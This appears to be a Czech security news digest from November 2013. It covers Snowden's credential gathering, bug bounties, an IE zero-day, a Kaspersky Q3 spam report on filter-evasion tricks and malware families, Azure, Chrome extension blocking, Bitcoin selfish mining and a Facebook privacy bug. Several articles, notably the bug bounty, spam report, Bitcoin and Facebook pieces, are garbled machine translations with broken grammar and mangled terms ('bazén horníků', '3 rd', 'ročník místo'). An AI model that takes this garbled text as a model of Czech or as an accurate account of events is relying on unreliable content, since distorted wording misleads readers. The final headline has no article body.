Podle informací, které ve čtvrtek uveřejnila agentura Reuters, to byla právě přístupová práva prověřených osob, která posloužila jako vrátka k informačním skladům. Reuters citují nejmenovaný vládní zdroj, podle kterého se Snowdenovi podařilo přesvědčit něco mezi 20 až 25 spolupracovníky, aby mu poskytli všechny nezbytné údaje potřebné k přihlášení se pod jejich jménem. K tomu mu stačilo tvrzení, že to potřebuje pro svou práci správce systému.
Přibližně před dvěma měsíci prohlásil technický ředitel NSA lonny Anderson, že Snowden zneužil své pozice správce systému, díky které se mu podařilo získat dokumenty z intranetového portálu NSA, který slouží pro sdílení dokumentů a diskusím o nich. Pokud jsou ale nové informace pravdivé, znamená to, že Snowden pro své „aktivity“ nepotřeboval žádné zvláštní znalosti ani pozici, pouze jisté sociální inženýrství a přesvědčovací schopnosti. Současně z toho vyplývá, že měl pravděpodobně přístup k podstatně více materiálům, než se pracovníci NSA domnívali, respektive předstírali, že se domnívají.
Podle mnoha bezpečnostních expertů je podobné laxní chování se k vlastním přihlašovacím údajům ve větších společnostech poměrně časté. Podle výzkumu firmy Cyber Ark z počátku tohoto roku, kterého se účastnilo 236 ředitelů IT různých společností, ve více než 51 % případů byla hesla k privilegovaným nebo přímo správcovským účtům sdílena mezi více pověřenými uživateli. V případě korporací nad 5000 zaměstnanců to již bylo 57 %.
Sdílení hesel, především těch k citlivějším funkcím, samozřejmě může vést k obcházení všech kontrolních mechanismů společností. Většinou je to výsledek nedostatečného školení uživatelů a nedostatečného nasazení technologií, které by monitorovaly aktivity na účtech s vyššími právy. I v korporacích je přitom poměrně jednoduché své heslo nesvěřovat ani správcům systému, prostě musí pracovat společně s vlastníkem účtu, který se v případě potřeby přihlásí sám.
Samozřejmě to vše vyvolává otázky, jak vůbec má právě NSA, specializující se na operace s tajnými informacemi, zabezpečenou vlastní síť a do jaké míry se namáhala mít interní kontrolní mechanismy. A pokud se nedá spolehnout na to, že agentura jako NSA, která monitoruje a zaznamenává informace proudící po většině internetu, si je dokáže ohlídat na vlastním hřišti... čemu už uživatelé mají věřit?
Microsoft a Facebook oznámit chybu odměnu
10.11.2013 IT | Bezpečnost
Microsoft a Facebook pod záštitou HackerOne oznámili bug bounty programu pro klíčové aplikace, které pohánějí Internet. Odměna zahrnuje širokou škálu aplikací od pískovišť v populárních prohlížečů na programovacích jazycích, které napájení LAMP, PHP, Perl, Ruby a Rails, na webových serverech, které slouží do obsahu, Nginx a Apache a další. Prémií pro úspěšné zranitelnosti zprávě jsou od několika set dolarů na několik tisíc.
Jsem v minulosti, byla na plotě nad hodnotu chyb prémií. Ale nedávné záplavě zero-day útokům se mi tento postoj přehodnotit. Je jasné, že musíme najít způsob, jak snížit počet chyb v softwaru, jako na počátku cyklu vývoje softwaru, jak je to možné. Pocházím z pozadí vývoje softwaru a jsem si bolestně vědomi toho, jak je těžké se vyhnout chybám v kódování a testování nikdy nemůže vykonávat všechny možné způsoby aplikace může být zneužit. Jednou jsem byl v přesvědčení, že nástroje kód pokrytí a statické a dynamické nástroje analýzy by zacelil mezeru, že poněkud, ale jaké nástroje existují nepotkal očekávání.
Až přijde den, nepravděpodobné, že můžeme zajistit aplikace jsou rozmístěny bez chyb snad nejlepší, co můžeme dosáhnout je chyba prémií, které vám pomohou zůstat trochu před padouchy.
- Rick Wanner MSISE - rwanner na isc sans dot dot EDU - http://namedeplume.blogspot.com/ - Twitter: namedeplume
IE zero-day zranitelnost Využití Msvcrt.dll
9.11.2013 Zranitelnosti
FireEye Labs objevil exploit ", která využívá nový informační úniku zranitelnost IE a out-of-bounds memory access zranitelnosti k dosažení spuštění kódu." [1] Na základě jejich analýzy, se týká IE 7, 8, 9 a 10.
Podle společnosti Microsoft, lze tuto chybu zabezpečení lze zmírnit Emet. [ 2 ] [ 3 ] Další informace o FireEye Labs funkce k dispozici zde .
[1] http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html
[2] https://isc.sans .edu / forums / Deník / EMET 40 + je + + nyní k dispozici + pro + download/16019
[3] http://www.microsoft.com/en-us/download/details.aspx?id=39273
Spam ve 3. čtvrtletí 2013
9.11.2013 Spam | Analýza
Zdroj: Kaspersky
Čtvrtletí v číslech
Zpět k základům
Novinky a malware
Statistika
Podíl nevyžádané pošty v e-mailovém provozu
Zdroje spamu podle země
Zdroje spamu podle krajů
Velikost nevyžádaných e-mailů
Škodlivé přílohy v e-mailu
Phishing
Závěr
Čtvrtletí v číslech
Podíl nevyžádané pošty v e-mailovém provozu celkem snížila o 2,4 procentního bodu od druhého čtvrtletí roku 2013 a přišel do 68,3%.
Procentuální podíl phishingových e-mailů rostl trojnásobně a činila 0,0071%.
Škodlivé přílohy byly zjištěny v 3,9% všech e-mailů - 1,6 procentního bodu více než ve 2. čtvrtletí 2013
Zpět k základům
Ve 3. čtvrtletí 2013, spammeři vyžívá v stereotypní propagaci léků na zlepšení potence byly obzvláště kreativní, kombinující techniky sociálního inženýrství s triků, jak obejít filtry nevyžádané pošty.
V jednom hromadnou korespondenci se používají následující metody: Předmět e-mailu používá řetězec symboly, které se podobají slovo "Viagra", zatímco text byl omezen na jeden odkaz na farmaceutické webu.
Minimalistický přístup pomáhá obejít filtrování obsahu. Nejsou žádná klíčová slova, které se nacházejí, protože slovo "Přípravek VIAGRA" nelze číst filtru, i když je zřejmé, lidské čtenáře. Protože každý email našel jiný "kód" pro Viagra, to nestačí jen přidat nové slovo do databáze jeden. Vzhledem k tomu, UTF-8 obsahuje symboly ze všech jazyků - včetně velmi vzácných ty. Většina jazyků má své vlastní jedinečné písmena, modifikátory a symboly, i když jsou založeny na známém latinkou. V důsledku toho existuje více než 100 symbolů, které by mohl být vykládán jako písmeno "a". To není překvapující, že tam jsou stovky milionů různých možných kombinací, které by mohlo znamenat "Viagra".
Další hromadnou korespondenci poslal jménem populárního e-mailu nebo sociálních sítí zdrojů doporučuje příjemci registrovat, přečtěte si novou zprávu nebo reagovat na selhání doručení. Nicméně, kliknutím na odkaz poslal uživatelů na sníženou webové stránky, které přesměrované je on-line obchodu, který prodává léky na zvýšení potence.
Autoři hromadnou korespondenci napodobil oznámení z mnoha společností, včetně Apple, Yahoo, Google, Amazon, eBay, Twitter, Instagram, Skype apod. Spammeři neměl dát hodně úsilí do těchto zpráv: falešné e-maily odeslané na účet různých společností byly navrženy s použitím stejné šablony, pouze název společnosti byl změněn.
Zajímavé je, že tento přístup (falešné oznámení, odkaz na sníženou stránky a přesměrování do konečného místa) často používá spammeři distribuci škodlivého kódu. Tento typ spamu se šíří prostřednictvím partnerských programů, kde spammer zisky z každého uživatele, který klikne na odkaz a skončí s infikovaného počítače. Podmínky pro reklamní zásilky jsou stejné, kromě toho, že zde spammeři získat provizi z prodaných pilulek přes distribuovaných odkazy. To znamená, že útočníci používají stejnou taktiku pro různé partnerských programů. Ve 3. čtvrtletí jsme zaznamenali případy, pomocí stejného hromadnou korespondenci ve dvou různých partnerských programů: na odkazy v e-mailech vedly k různým zdrojům v závislosti na regionu nebo denní době. Například uživatelé byli v zemích, kde jsou léky dostupné pouze na lékařský předpis přesměrováni na stránky Viagra, zatímco všichni ostatní příjemci byli přesměrováni na podvodné nebo škodlivé zdroje.
Ještě jeden spam hromadnou korespondenci využívány techniky sociálního inženýrství (falešné oznámení od oblíbené zdroje) a odkaz mlžení.
E-maily napodobil oznámení ze střediska zpráv služby Google. Tělo zprávy obsahovalo odkaz na doménu Google. Ve skutečnosti, spammeři používali Google.Translate služby maskovat své vlastní internetové stránky: oni dělali žádost přeložit webových adres. Podvodníci nevyžaduje žádný skutečný překlad, protože stránky byly zpočátku anglického jazyka a byly přeloženy do angličtiny.
Spammeři používají ještě další trik: některé znaky v odkazu (liší v každém e-mailu) byly nahrazeny pro odpovídající hexadecimální ekvivalent v ASCII. Prohlížeč snadno rozpoznatelné obfuscated odkaz a otevřít příslušnou stránku, ale i pro spamové filtry každý odkaz vypadal jedinečný.
Novinky a malware
Q3 2013 byl bohatý na události, které vedly k veřejnému zájmu, jako je narození královského dítěte ve Velké Británii, FBI hon na Edwarda Snowdena a železniční nehody ve Španělsku. Všechny tyto zprávy byly použity podvodníci k distribuci malwaru.
V nebezpečných e-mailů registrovaných společností Kaspersky Lab ve 3. čtvrtletí 2013 přišel v různých formách, ale nejčastěji napodobil zásilky hromadných zpráv. Nicméně, odkazy obsažené ve všech e-mailech vedlo k ohrožení webových stránek, které uživatelé přesměrováni na stránku s jedním z nejpopulárnějších exploit kity - Blackhole. Jakmile se uživatel dostane na stránku, Blackhole začne hledat chyby v jejich softwaru. Pokud se zjistí, že některý, stáhne několik škodlivých programů, včetně spyware Trojan navržen tak, aby krást osobní údaje z napadených počítačů.
V říjnu, autor Blackhole, jít pod přezdívkou břicho, byl zatčen v Rusku . Budoucnost tohoto souboru využije, není jasné. Buď někdo jiný převezme řízení Blackhole soupravy nebo spammeři se stěhují do jiných sad. Ať tak či onak, je pravděpodobné, že bude méně příkladů těchto nebezpečných zásilek "News".
Statistika
Podíl nevyžádané pošty v e-mailovém provozu
Podíl nevyžádané pošty v e-mailovém provozu celkem během třetího čtvrtletí letošního roku přišlo na 68,3%, což je 2,4 procentního bodu od druhého čtvrtletí.
Podíl nevyžádané pošty v e-mailovém provozu ve 3. čtvrtletí 2013
Tento pokles však nelze chápat jako začátek trendu, podíl ve třetím čtvrtletí jen o 0,3 procentního bodu nižší než průměr od ledna do června na ukazateli
Zdroje spamu podle země
Rozdělení zdrojů spamu v jednotlivých zemích ve 3. čtvrtletí 2013
Ve 3. čtvrtletí tři nejlepší spam zdroje nezměnily: Čína (-0,9 procentního bodu), USA (1,2 procentního bodu) a Jižní Korea (2,1 procentních bodů). Celkový podíl těchto tří zemí tvořily 55% světového spamu provozu.
Stejně jako v předchozím čtvrtletí, Tchaj-wan přišel 4 th v hodnocení (0,1 procentních bodů).
Dále následuje Rusko (1,3 pb), jejichž podíl se zvýšil více než 1,5 krát.
Je zajímavé, že ruská rostoucí příspěvek shodoval s poklesem hladin spamu pocházející z jiných bývalých sovětských republikách - Bělorusko (-0,9 pb), Ukrajina (-0,9 pb), Kazachstán (-1,5 procentního bodu) - zatímco ve 2. čtvrtletí 2013 to země vyrábí mnohem více nevyžádané pošty než Rusku.
Změny v procentech spamu pocházejících z Běloruska, Ukrajiny a Kazachstánu ve 3. čtvrtletí roku 2013.
To však nutně neznamená, že spammeři uspořádání nových botnetů: Tyto fluktuace mohou být způsobeny například tím, že vymění z jednoho stávajícího botnetu na druhé, když šíření rozsáhlé korespondenci.
Zdroje spamu podle krajů
Rozdělení zdrojů spamu podle krajů ve 3. čtvrtletí 2013
Ve 3. čtvrtletí hodnocení z největších zdrojů spamu podle krajů nedoznala žádné výrazné změny z prvních dvou čtvrtletích roku 2013. Podíl krajů zůstaly téměř stejné taky.
Asie zůstal číslo jedna regionální zdrojem spamu (+ 0,2 pb). Dále následuje Severní Amerika (1,9 pb) a západní Evropy (-0,2 pb).
Podíl ostatních regionech se výrazně neliší.
Nápadně, není vždy korelace mezi tím, kde je spam poslán, a kde se vyrábí. Například, mnoho afrických spamu jde do Ruska, které pocházejí z Jižní Koreje je často poslán do Evropy, zatímco spam ze západní Evropy je rovnoměrně rozložen po celém světě.
Velikost nevyžádaných e-mailů
Velikost nevyžádaných e-mailů: Q3 2013
Jak je vidět z grafu, podíl malých nevyžádaných e-mailů váží méně než 1 KB je stále čtvrtletí od čtvrtletí. Většina z těchto e-mailů obsahuje téměř žádný text. Ty obsahují pouze odkaz, který obvykle vede k přesměrování stránky nebo krátké spojení služby, která činí v každém e jedinečný. Tyto e-maily vytvářet problémy pro spamové filtry a vzhledem k jejich malé velikosti, mohou být zaslány rychle a ve velkém množství.
Škodlivé přílohy v e-mailu
Úroveň škodlivých příloh ve třetím čtvrtletí o 1,6 pb vyšší než v druhém a přišel na 3,9% všech mailů.
Top 10 škodlivých programů se šíří emailem ve 3. čtvrtletí 2013
Trojan-Spy.HTML.Fraud.gen překonal hodnocení z nejpopulárnějších škodlivého programu šíří e-mailem ve třetím čtvrtletí tohoto roku. Tento škodlivý program je navržen tak, aby vypadal jako HTML stránky slouží jako registrační formulář pro on-line bankovnictví. To je používáno phisherů ukrást finanční informace.
Stejně jako v předchozím čtvrtletí, E-Worm.Win32.Bagle.gt skončil druhý. Tento e-mail červ, na rozdíl od jiných, mohou zaslat kopie sebe sama s kontakty v uživatelova adresáře a také přijímat vzdálené příkazy instalovat další malware.
Naše Q3 hodnocení zahrnuje dva červy Mydoom rodiny, které zabírají 3 rd a 4 th míst. Tyto škodlivé programy jsou určeny pro sběr e-mailových adres z adres uživatelů knih. Tento způsob sběru adres znamená, že vaše e-mailová adresa může spadnout do rukou podvodníci ", i když to není veřejně přístupná. Mydoom rodina je velmi starý, ale je i nadále efektivně pracovat na počítačích, kde software není aktualizován. E-Worm.Win32.Mydoom.m můžete posílat skryté požadavků na vyhledávání na vyhledávačích. Porovnává adresy míst zobrazených na první stránce výsledků vyhledávání a adresy, které má stažené ze serverů podvodníky. Poté, co našel shodu, otevře odkaz na stránce vyhledávače a zvýšit tak hodnocení výsledků vyhledávání pro konkrétní místa.
Zástupci Zeus / Zbot rodiny obsadil 5. ročník , 6 th , 7 th a 9 ročník místa. Tyto škodlivé programy jsou navrženy tak, aby krást důvěrné informace - obvykle údaje o platební kartě - z počítačů.
Trojan.Win32.Llac.dleq dokončil čtvrtletí v 8 ročníku místě. Tento program je hlavním úkolem je špehovat uživatele: shromažďuje informace o používání softwaru (většinou o antivirové programy a firewally) v počítači nainstalována, o PC sám (procesor, operační systém, disky), to zachytí obrazy webové kamery a hlavní tahy (keylogger) a sklizní důvěrná data z různých aplikací.
Trojan.Win32.Bublik.beyb přišlo 10 th . Tento trojan je hlavní funkcí je tajně stáhnout a nainstalovat nové verze škodlivých programů na počítačích oběti. Zdá se, ve formě. EXE soubor s dokumentem Adobe PDF ikona.
Distribuce škodlivých programů se šíří e-mailem ve 3. čtvrtletí 2013 je následující:
Top 10 rodin škodlivých programů šíří emailem ve 3. čtvrtletí 2013
Ve 3. čtvrtletí 2013 Zeus / Zbot rodina se ujal vedení. Dále následuje rodiny Tepfer ačkoli žádný z jeho úprav vstoupil do Top 10. Tento typ Trojan byl navržen tak, aby ukrást hesla pro uživatelské účty. Podvod rodina trojských koní je 3 rd místě, s Trojan-Spy.HTML.Fraud.gen individuální vůdce.
Rodina Bublik byl 4. ročník . Páté místo bylo obsazené Androm rodiny, která stahuje a spouští škodlivé soubory na oběti počítačích.
Seznam zemí, na něž se zaměřuje nejčastěji nebezpečných e-mailů prošel některé změny od druhého čtvrtletí tohoto roku.
Distribuce e-mailových antivirových odhalení na zemi ve 3. čtvrtletí 2013
USA je stále číslo jedna v ratingu (-0,2 pb). Německo posunula od 3 rd do 2 druhém místě, zatímco Ruska klesl na 9. ročníku místo (-8,6 procentního bodu), blíže ke své obvyklé umístění. UK dokončil Top 3 s nárůstem o 2,8 procentního bodu.
Ve 3. čtvrtletí 2013 jsme narazili na jednu velmi zajímavou hromadnou korespondenci - podvodníci napodobil odpověď od služby technické podpory velké antivirové společnosti.
Napsat informoval uživatele, že soubor, který údajně byl poslán k analýze, se ukázal být malware. "Technická podpora inženýr" nazval verdikt (v našem příkladu mydoom.j) a navrhl použít přiložený podpis dezinfikovat počítač. Pokud však uživatelé (kteří pravděpodobně neposlal žádné vzorky na prvním místě) otevřel příloha, by pro ně škodlivý program zjištěné aplikací Kaspersky Anti-Virus, jak e-mailem Worm.Win32.NetSky.q.
Zajímavé je, že spammeři udělal chybu: adresa v poli Od použity oficiální adresu technické podpory společnosti Symantec službu, když auto-podpis v e-mailu s názvem jiné společnosti, antivirového - F-Secure.
Phishing
Ve 3. čtvrtletí 2013 se podíl phishingových e-mailů trojnásobně vzrostl oproti předchozímu čtvrtletí a činila 0,0071%.
Distribuce Top 100 organizací nejčastěji namířena phisherů, * podle kategorií - 3. čtvrtletí 2013
* Toto hodnocení je založeno na anti-phishing společnosti Kaspersky Lab dílčích odhalení, které jsou aktivovány pokaždé, když se uživatel pokusí klikněte na odkaz phishing, bez ohledu na to, zda je odkaz v nevyžádaných e-mailů nebo na webové stránce .
Ve 3. čtvrtletí oznámení ze sociálních sítí se nejčastěji napodobovány phishingových e-mailů. Zprávy odeslané na účet e-mailových služeb a vyhledávačů byly v 2 nd a 3 rd míst. Ve skutečnosti jsou tyto dvě kategorie je obtížné oddělit, jak mnoho velkých firem kombinovat vyhledávač a webmail funkce.
Celkově tyto tři kategorie představuje více než 60% všech útoků v Top 100 organizací, nejčastěji na něž phisherů. Tento údaj ukazuje, že zpeněžení phishingu je do značné míry založena na prodej odcizených pověření účtu, které mohou být použity v pořadí pro distribuci spamu přes svých seznamů kontaktů.
Finanční a e-pay organizace a banky přišel 4 th v seznamu phisher cílů. To neznamená, že jsou méně phishingu zájem bank. To je více pravděpodobné, že útoky na jednotlivé instituce jsou jen zřídka v tak velkém rozsahu, že dostat se do Top 100.
Závěr
Ve 3. čtvrtletí 2013 spammeři aktivně využívají jak staré a nové triky, aby se vyhnula filtrování, stejně jako techniky sociálního inženýrství přesvědčit uživatele, aby klikněte na potřebné odkazy. Například jeden z nejčastějších triků šíření škodlivého softwaru je použití vysoce postavených novinové články a design e-maily ve formě bulletinů. Některé triky, jako například falešné e-maily odeslané jménem známého internetového zdroje, byl považován za zvláště účinný a používán v různých partnerských programů. Například by odkaz v e-mailu imitujícím oznámení z Facebooku, v různých dobách, které vedlo ke léky webu Reklama na webu nebo obsahující využije.
Nicméně, zatčení soupravy Blackhole Exploit tvůrce ukázal, že zločinci nemají zůstat nepotrestány, a to i v Rusku s jeho relativně slabou legislativou proti zločinci. Budeme i nadále sledovat vývoj v této věci.
Q3 2013 viděl malou změnu v hlavních zdrojů spamu podle země. Na regionální úrovni bylo ještě méně změna. Zdá se, že umístění botnetů je poměrně stabilní, nebo alespoň je klid v aktivní přemístění botnetů.
Navzdory mírnému poklesu podílu nevyžádané pošty v e-mailovém provozu, podíl škodlivého spamu vzrostla více než 1,5 krát ve srovnání s předchozím čtvrtletím. Většina malware šíří přes e-mail cílené uživatelská jména, hesla a důvěrné finanční informace.
Pokud jde o phisherů, jejich nejatraktivnější cíle byly uživatelské účty sociálních sítí, e-mailu a dalších zdrojů.
Další dávka nových funkcí pro Azure
9.11.2013 IT
Microsoft přináší další významné rozšíření funkcí svého cloudu Azure během pouhých 14 dní.
Společnost Microsoft se pustila do boje o svou pozici v jednotlivých segmentech (ať už v divizi OS, cloud, web nebo mobilních služeb) dosud nevídaným tempem. Jen pro svůj cloud Azure již podruhé během dvou týdnů uvolňuje velký balík funkcí, které jsou z větší částí ihned dostupné pro jeho uživatele.
V první várce se objevilo především Backup Services, cloudové řešení zálohy souborů a složek pro Windows Server, na který stačí nainstalovat volně stažitelný Azure Backup Agent. Ten už se postará o efektivní a bezpečný přenos zálohy na Azure Backup Services. Data jsou zašifrována před odesláním do cloudu a jsou tedy po celou dobu zcela pod kontrolou uživatele.
Značně byla rozšířena integrace Active Directory, kterou je nyní možné využívat pro správu stovek aplikací typu SaaS (Software as a Service). Vedle desítek vylepšeních správy virtuálních strojů, v rámci aktualizace Azure SDK 2.2 se také poprvé objevila veřejná testovací verze pro Azure Hyper-V Recovery Manager nabízející funkce Disaster Recovery pro privátní cloudy.
Mezi novinkami tohoto týdne je působivá především možnost fyzického transportu dat. Uživatelé, kteří potřebují přenést veliké množství dat, je mohou poslat na pevných discích a Microsoft je naimportuje do jejich účtu. To značně zkrátí čas například první zálohy, kdy se budou posílat data pouze rozdílová proti datům přeneseným fyzicky. Funkce importu/exportu mají zabudovanou podporu pro šifrování BitLocker a není tedy třeba se obávat ani krádeže disků během přepravy.
Microsoft velmi zapracoval na dostupných bitových obrazech a v nové galerii virtuálních strojů lze snadno vybírat a spouštět stovky instancí, ať už s otevřeným zdrojovým kódem, nebo komerčních, u kterých je okamžitě dostupná a zřejmá přesná cena. Mimochodem, nová služba Billing Alert Service uživatelům zašle e-mail v okamžiku, kdy účet za cloudové služby dosáhne přednastavenou mez.
K velkým předpřipraveným řešením patří HDInsight, což je služba plně kompatibilní s Hadoopem, nejrozšířenějším frameworkem pro zpracovávání velkých dat. To znamená, že uživatelé mohou používat nástroje Hadoopu, jako jsou Pig nebo Hive, na datech uložených ve Windows Azure, přesněji v Azure Blob Storage. Jednotlivé clustery Hadoopu lze tak dynamicky vytvářet a rušit dle potřeby (účtovány jsou samozřejmě pouze běžící aplikace, což v aplikacích využívajících velká data může přinést nezanedbatelné úspory).
Je očividné, že to Microsoft s Azure myslí vážně. Jeho úsilí o poskytování nových a nových variant použití jeho cloudových služeb ukazuje, že je považuje za klíčovou část svého současného portfolia.
Google chce blokovat některá rozšíření v Chromu
9.11.2013 Zabezpečení | Ochrana
Společnost chce povolit pouze rozšíření pocházející z oficiálního tržiště aplikací. Tento krok by měl přispět k větší bezpečnosti uživatelů prohlížeče od Googlu.
Google se konkrétně zaměří na rozšíření, která si uživatelé nestáhli z oficiálního distribučního místa. Tím je v tomto případě internetový obchod Chrome. Nová funkce se má v prohlížeči objevit v lednu příštího roku.
Google se k takto radikálnímu kroku rozhodl z důvodu rostoucího počtu škodlivého softwaru a velkého množství uživatelů, kteří si do svých prohlížečů instalují rozšíření stažená z neověřených zdrojů. Zákazem nevěrohodných doplňků se má zvýšit nejen bezpečnost uživatelů, ale rovněž by se mělo ulevit pracovníkům Googlu, kteří problémy způsobené škodlivými doplňky musí řešit.
„Rozšíření jsou ve své podstatě skvělým pomocníkem. Uživatelé díky nim mohou být neustále informováni o dění na sociálních sítích nebo být v kontaktu s oblíbeným sportovním týmem. Mnoho služeb nabízí své vlastní doplňky, přičemž Chrome se vždy uživatelů ptá, jestli souhlasí s jejich instalací či nikoliv,“ říká Eric Kay, šéf vývoje Chromu.
„Někteří lidé však tohoto mechanismu zneužívají a do uživatelského prohlížeče potichu instalují škodlivá rozšíření, která mění nastavení prohlížeče a výrazně narušují uživatelský komfort – mění například vzhled stránky Nová karta. Od uživatelů nám pak kvůli tomu chodí velké množství stížností.“
Všechny výše uvedené problémy mají s příchodem ledna zmizet. Rozšíření stažené odjinud než z Chrome Store se do prohlížeče nebude mít šanci dostat. Pro vývojáře doplňků zase půjde o další důvod, proč své produkty přesunout na oficiální distribuční kanál.
Uživatelů se podle Googlu změna dotkne pouze v pozitivním slova smyslu. Společnost prý i nadále bude podporovat vývoj lokálních rozšíření.
„Ochrana uživatelů je naší prioritou. Věříme, že tato změna pomůže lidem, jejichž prohlížeč byl škodlivým rozšířením nějak ovlivněn,“ dodal Kay.
Bitcoin výzkumník říká, že je "hloupost" Ignorovat nový útok
9.11.2013 Hacking | Počítačový útok | Kriminalita
Autor článku, který popisuje nový útok na Bitcoin protokol říká, že kritika článku jsou zavádějící a že existují vážné problémy s Bitcoin, které je třeba řešit.
Ermin Gun Sirer, profesor na Cornellově univerzitě, publikoval článek minulý týden spolu s jeho spoluautor Ittay Eyal, av něm vědci popisují útok, ve které bazén horníků Bitcoin by vytěžit své vlastní bloky a udržet je v tajnosti a pouze publikovat své řetěz, když je delší než jeden veřejný, které tvoří jejich autoritativní člověk. Tento tzv. "sobecký" těžební situace by pak teoreticky sněhová koule a přilákat více horníků do bazénu v naději na získání další odměny.
Kritici říkají, že práce se opírá o chybném předpokladu, že horníci by se jednat v nejlepším zájmu tohoto nového "sobeckého" těžební skupiny, spíše než v jejich vlastním zájmu, což by mohlo vést k jejich poskakování tam a zpět mezi sobeckým těžební skupiny a hlavní bazén horníků. Jiní, včetně vedoucího vývojáře Bitcoin, bagatelizoval útok s tím, že to není hlavní problém v reálném světě.
"Velmi časté reakce na bezpečnostní chyby je pro oddaných stoupenců, aby se minimalizovalo problém. Připomínky, které jsem viděl z rozumní lidé uznávají, že se jedná o závažný problém, ale že útok pravděpodobně nebude mít úspěch přes noc, a proto tam bude čas na oblast lidských měřítek, reagovat na problém. Doufáme, a podezření, že je to pravda, protože chceme Bitcoin být životaschopná měna, "řekl Sirer e-mailem.
"Ale to by bylo pošetilé ignorovat problém, nebo se spolehnout na manuální zásah jednat s automatických, mechanických útoku. Distribuované systémy jsou robustní, do té míry, že jejich silné a slabé stránky jsou dobře popsány. A Bitcoin silných byly nadhodnocené do našich zjištění.
"A měnové systémy jsou robustní, do té míry, že poskytují správné peněžní pobídky účastníků. V současné době Bitcoin se zdá být v území, kde je to spoléhat na laskavost cizích lidí. "
Myšlenka skupiny horníků získává dostatek energie, aby se nad systémem Bitcoin není nová, ale útok navržena sirer a Eyal závisí na mnohem menší bazén horníků splnit úkol, jedna třetina všech uživatelů . Je-li takový útok se stalo, nebo se pokračuje se v této věci, snaží se zjistit, kdo tito horníci by se mohla stát jednou z priorit. Sirer řekl, že je jasné, zda je to možné právě teď.
"Selfish horníci mohou mít sítě podpis, kde se zdá, že nabízejí bloky souběžně s ostatními. A pokud členství v sobecké bazénu je otevřen všem, mohou být infiltrovány. Avšak v každé opatření, jsou protiopatření. Například by mohly být sobecké horníci schovávat za jedno použití adres, které omezují množství informací, které odhalí účastníkům, atd. Identifikace sobecké horníků a vyškrtávali je ze sítě je nepravděpodobné, že bude snadné, "řekl Sirer.
otec-dcera Hacking Team Najde hodnotné Facebook Bug
8.11.2013 Hacking | Kriminalita
Wysopal jméno bylo na zranitelnosti rad na lepší než 20 let, a to nevypadá, že skončí v dohledné době. Ale jméno na těch rad v budoucnu může být Renee než Chris Wysopal .
Chris, jeden ze zakládajících členů L0pht hacking kolektivní a nyní ČTÚ a CISO na Veracode, pomáhal formovat tak, že chyby byly oznámeny dodavateli a zveřejněny pro uživatele a je součástí některých úsilí celé odvětví definovat zveřejnění pokyny a dodavatelů odpovědi. Zatímco na @ sázce Wyspoal a zbytek výzkumného týmu byli v čele hnutí, která se snažila tlačit dodavatele do úzce a upřímně bezpečnostních výzkumníků, kteří zveřejněných chyby k nim.
Nyní jeho dcera Renee se po jeho stopách. Během letní stáže v Veracode, Renee, druháku na Trinity College v Hartfordu, Connecticut zúčastnil společnosti výroční hackathon, den-dlouhá událost, ve které jsou všichni zaměstnanci povzbuzováni k účasti a pracovat na hacking projektu. Renee, který pracoval v oddělení lidských zdrojů, se rozhodl pracovat se svým otcem na projektu najít chybu, která by se kvalifikovaly na bug bounty na Facebooku.
"Já viděl na Twitteru, že Facebook bude platit odměnu, tak jsem okamžitě něco dělat se svým otcem, a on řekl, že bychom měli udělat to společně, protože jsem ve škole a Facebook je velmi rozšířená v mé věkové skupině, a můj táta je hacker, takže jsme si mysleli, že by bylo zábavné, aby to dohromady, "řekla.
Vzhledem k tomu, Renee bezpečnostní nováček, začali od začátku. Chris začal tím, že ukazuje jí, co by udělal pro řešení webové aplikace, jako je Facebook.
"Začal jsem tím, že ukazuje jí, jak používat webový server proxy a zobrazit zdroj a upravit různé parametry mimo webové rozhraní, takže si mohl zaútočit na webové aplikace," řekl Chris. "Takže odešla začal přemýšlet o tom, kde by mohla být chyba a ona se přiklonil k jednomu z chlupatější částí Facebook, který je soukromí a povolení modelu."
Takže Renee začal šťourat se Facebook aplikace a během několika dnů se začala soustředit na funkci, která umožňuje uživatelům blokovat ostatním uživatelům ze svých stránek. Je to velmi používaná soukromí funkce a myšlenka je umožnit uživatelům, aby lidé už nejsou zájem o interakci s byla schopna posílat zprávy o jejich profilů. Renee si všiml, že tam bylo spoustu zpráv na její straně od někoho, ona blokován nějakým časem.
"Myslel jsem, že tam musí být nějaký druh slabosti tam," řekla, "když Facebook stále dovolit jí, aby její jméno po celém mém profilu. Myslím, že jsem na to přišel další den. Četl jsem všechno o klobouk Facebook bílé programu a žádají použít testovací účty. Použil jsem testovací účet, takže jakmile to fungovalo byl jsem nadšený, ale já myslel, že to byla jen chyba v testovací účet. "
Ona pak zkouší to na kamaráda účet a zjistili jsme, že to ještě funguje. Po zablokování sama na své kamarádky účtu, když byl ještě schopný se dostat zprávy přes její kamarádky účtu. Takže s pomocí svého otce, Renee sepsal zranitelnosti zprávu a předložila jej k chybě Facebooku nájemný programu v srpnu. Ve chvíli, kdy našel chybu, zkouší to a předložila zprávu, Veracode hackathon byl téměř u konce a je čas na Renee a Chris dodávat svou zprávu o tom, co jsme dosáhli. Ale ještě neměl odpověď od Facebooku na tom, zda je chyba kvalifikaci pro odměnu.
"Bylo to zklamání, protože jsme museli dát zprávu a my jsme nedostali odpověď Ještě ne," řekla Renée. "Všichni bychom mohli říci, bylo, jsme podali tuto zprávu. V určitém okamžiku řekli, dostaneme se zpět k vám později. "
Později se ukázalo být více než dva měsíce, ale když přišla odpověď, je to dobrá zpráva: Renee si vysloužil jí 2500dolar odměnu z Facebooku.
"Bylo to určitě překvapení. Vrátil jsem se do školy a nějak na to zapomněl a právě zaměřen na školy, "řekla. "Rozhodně jsem myslel, že jsem neměl v úmyslu nic najít, ale jsem si můj táta."
Renee, který není prohlášen za hlavní, ale zatím se naklání směrem k politické vědě, řekla, že opravdu neměl mít dobrou představu o tom, co její otec udělal, když byla mladší.
"Vždycky jsem si vzpomenout, že je stále ve své domácí kanceláři na svém počítači psaní podivné znaky. I když mi bylo šest nebo sedm, tak bych se zeptat, co dělá, a že bych byl hacking. Neměl jsem tušení, co to bylo, "řekla. "Pravděpodobně to byl teprve v posledních několika letech, že jsem si uvědomil, jak cool věci udělal, bylo, po přečtení jeho wikipedie. Je to docela skromný o tom. "
Takže má její vpád do hackerské ji prodal na následující její otec dráhu?
"Pro tuto chvíli si myslím, že je to jeden a hotovo typ věc, protože je to tak frustrující proces. V některých ohledech mám pocit, že jsem štěstí najít to, "řekla.
Útočníci Zvedněte $ 1.2M z Bitcoin Wallet služby
8.11.2013 Hacking | Kriminalita
